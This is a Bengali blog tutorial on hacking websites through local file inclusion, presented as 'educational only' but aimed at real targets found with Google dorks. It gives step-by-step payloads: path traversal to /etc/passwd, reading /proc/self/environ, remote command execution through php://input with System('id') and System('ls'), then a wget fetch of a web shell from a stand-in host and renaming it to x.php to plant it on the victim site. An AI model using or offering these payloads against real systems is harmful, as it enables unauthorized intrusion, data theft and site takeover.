LFI মেথড ব্যাবহার করে হ্যাক করুন ওয়েবসাইট।

সবাইকে স্বাগতম আমার টিউটোরিয়ালে।

(টিউটোরিয়ালটি শুধুমাত্র শিক্ষনীয় উদ্দ্যেশ্যে লেখা)

আজকের টিউটোরিয়ালে আমরা LFI হ্যাকিং সম্পর্কে জানবো।এবং কিভাবে এক্সপ্লইট করতে হয় সেটা শিখবো

LFI Vulnerability কিঃ

সোজা ভাষায় বলতে গেলে কোনো স্ক্রিপ্টে বা সাইটে LFI Vulnerability  থাকলে । সেই সাইটে কিছু নির্দিষ্ট কোড এক্সিকিউট করলে। সেই সাইটের স্পর্শকাতর তথ্য সমূহ আপনি আপনার ওয়েবপেইজে দেখতে পাবেন ।

কোড রান করাবেন কিভাবে ?

আপনি যে সাইটে LFI দুর্বলতা পাবেন ।সেই সাইটের এড্রেসের শেষে আপনি কিছু নির্দিষ্ট কোডের মাধ্যমে সাইটি এক্সপ্লইট করতে পারবেন । এমনকি সাইটটিতে শেল আপলোড করে সাইটের যে কোনো ডাটা এডিট,ডিলেট

এবং আপনার নিজের পেইজ,স্ক্রিপ্ট আপলোড দিতে পারবেন।

কিভাবে LFI Vulnerable Site বের করবেন?

প্রথমেই আপনার যদি কোনো টার্গেট সাইট না থাকে তাহলে গুগল Dork ব্যাবহার করে আপনি LFI Vulnerable সাইট বের করতে পারেন । আর টার্গেট সাইট থাকলে স্ক্যানারের মাধ্যমে আপনি সেই সাইটের LFI Vulnerability পেলে আপনি কাজ করা শূরু করে দিতে পারেন LFI Vulnerability নিয়ে। যায় হোক এই সব ব্যাপার বিস্তারিত বলার কোনো দরকার নাই। আশা করি আপনার নিজ মাথা খাটিয়ে ব্যাপার গুলো বুঝে নিবেন।

কিভাবে LFI Vulnerability চেক করবেন :

বেশীর ভাগ  LFI Vulnerability চেক করার জন্যে আপনি নির্দিষ্ট কিছু কোড ব্যাবহার করতে পারেন।

আর LFI Vulnerable Site এর লিঙ্ক হয় এরকমঃ

Examplelfi.com/index.php?page=

এর মানে এই নয় যে এই ধরনের যত সাইট আছে সব সাইট LFI Vulnerable!

যায় হোক । এখন আমি টেস্ট করবো এই সাইট ভুলনরাবল কিনা!

আমি একটি কোড রান করাবো এই লিঙ্ক এর = এর পর দেখি ওয়েবব্রাউজার আমাকে কি দেখায় ।

Examplelfi.com/index.php?page=../../../../../../../../../etc/passwd

আমি এই ধরনের রেসাল্ট দেখতে পেলাম :D

ছবিঃ

http://i.share.pho.to/b3506346_o.png

এবার আমরা আরেকটি কোড এক্সিকিউট করার পর দেখি সেটার রেসাল্ট কি আসে :D

কোডটি হচ্ছে:

/proc/self/environ

উদাহারণ দেখুনঃ

Examplelfi.com/index.php?page=/proc/self/environ

কিছুই দেখাচ্ছে না:

http://i.share.pho.to/76f5f4e7_o.png

যায় হোক আবার আমরা কিছু  PHP ডাটা ইনপুট করার চেষ্টা করবো ডাটা পোস্ট মেথড ব্যাবহার করে  যার জন্যে দরকার  হবে হ্যাকবার ।

এটা মোজিলা ফায়ারফক্সের একটি এডঅন, এবং হ্যাকারদের অত্যন্ত কাজের জিনিস।

এখন আমরা আমাদের টার্গেট সাইট একটা কমান্ড এক্সিকিউট করে আরো কিছু ইনফরমেশন পাওয়ার চেষ্টা করি।

নিচের ছবিটিতে লক্ষ্য করুন এখানে আমি কমান্ড ব্যাবহার করেছি এভাবেঃ

Examplelfi.com/index.php?page=php://input

এবং হ্যাকবারের নিচে Enable Post ডাটা নামে একটা অপশন আছে তার পাশে টিক চিহ্ন টি টিক করে করে দিলে নিচে আরেকটি বক্স ওপেন হবে যেটা দিয়ে ডাটা পোস্ট করা যায়

এবং সেখানে আমি কমান্ড দিলামঃ

<? System(‘id’); ?>

এই কমান্ড এক্সিকিউট করার পর কি রেসাল্ট আসছে সেটা একটু দেখি আসেন :D

ওয়েব সার্ভার রিলিটেড তথ্য :D

http://i.share.pho.to/4d0c0a62_o.png

এখন আসুন দেখি এই ডাইরেক্টরি তে কি কি ফাইল আছে

তার জন্যে কমান্ড হবে এরকম হ্যাকবারের এড্রেস লেখার জায়গায় এড্রেসটি আগের মতন থাকবে শুধু মাত্র পোস্ট ডাটার জায়গায় যে কমান্ডটি লেখেছিলাম তার মধ্যে সামন্য পরিবর্তন আসবে ।

এড্রেস থাকবে আগের মতনঃ

Examplelfi.com/index.php?page=php://input

এবং পোস্ট ডাটা বক্সে কমান্ড হবে

<? System(‘ls’); ?>

এই কমান্ডটি এক্সিকিউট করার পর ঐ ডাইরেক্টরি তে কি কি ফাইল আছে সেটা দেখাবে !

যায় হোক এই কমান্ডটি মনে রাখুন কারণ এটা শেষের দিকে দরকার হবে।

চলুন আবার তাহলে আসল কাজটা করেই ফেলি :D

শেল আপলোডের কাজ।

সেটাও করবো পোস্ট ডাটার মাধ্যমে ।। তার আগে আপনি গুগল থেকে বের করুন কোনো শেল হোস্ট করা আছে এমন কোনো ওয়েবসাইট, শেলটি টেক্সট ফরম্যাটে থাকলেই চলবে।

(বিস্তারিত দেখানো সম্ভব না :P)

এখন মনে করুন আপনার হোস্ট করা শেলটির লিঙ্ক এরকমঃ

http://yourshell.com/sh3ll.txt

এখন আমরা কমান্ড এক্সিকিউট করবো পোস্ট ডাটা বক্সটি ব্যাবহার করে। কিভাবে?

এড্রেস বক্সে থাকবে এই এড্রেসঃ

Examplelfi.com/index.php?page=php://input

এবং পোস্ট ডাটা বক্সে কমান্ড হবেঃ

<? System(‘wget http://yourshell.com/sh3ll.txt’); ?>

এইবার এক্সিকিউট করুন হ্যাকবারের মাধ্যমে এই কমান্ড J

ব্লাঙ্ক পেইজ দেখতে পাবেন রেসাল্টে !

এইবার একটা কমান্ড মনে রাখতে বলেছিলাম আগে :D

সেটা খেয়াল আছে তো ?

সেই কমান্ডটি হচ্ছেঃ

<? System(‘ls’); ?>

এখন যে ডাইরেক্টরিতে শেল আপলোড দিয়েছি সেই ডাইরেক্টরিতে শেলটি কিনামে সেভ হয়েছে সেটা দেখতে পাবো।

এছাড়াও ঐ ডাইরেক্টরির অন্য ফাইল গুলোর নাম ও দেখাবে কিন্তু আপনার আপলোড করা শেলের নাম দেখলেয় আপনি বুঝতে পারবেন কোনটা আপনার শেল! মনে করেন আমারটার নাম দেখতে পেলাম Sh3ll.txt

যায় হোক এইবার হচ্ছে রিনেম করার পালা।

আমরা আপলোড করা শেলটি রিনেম করবো । এবং টেক্সট ফরম্যাট থেকে পিএইচপি তে নিয়ে যাবো!

যার জন্যে আবার পোস্ট বক্সে কমান্ড লেখুন।

<? System(‘mv sh3ll.txt x.php’); ?>

কাজ শেষ J

এখন শেলের লিঙ্ক হবে: Examplelfi.com/x.php

আজকের টিউটোরিয়াল এখানেই শেষ আশা করি আপনারা নতুন কিছু শিখতে পেরেছেন ।

SQLi নিয়ে আরো কয়েকটি টিউটোরিয়াল লেখবো। তবে এর পরের টিউটোরিয়ালে হ্যাশ থেকে কিভাবে পাসওয়ার্ড বের করা যায় এবং শেল আপলোডিং নিয়ে লেখার চেষ্টা করবো।

ধন্যাবাদ সবাইকে ।

Previous
Next Post »

পোস্ট সম্পর্কিত সমস্যার জন্য মন্তব্য দিন।ডাউনলোড লিঙ্ক এ সমস্যা জন্য ইনবক্স করুন Aimzworld007
ConversionConversion EmoticonEmoticon

Thanks for your comment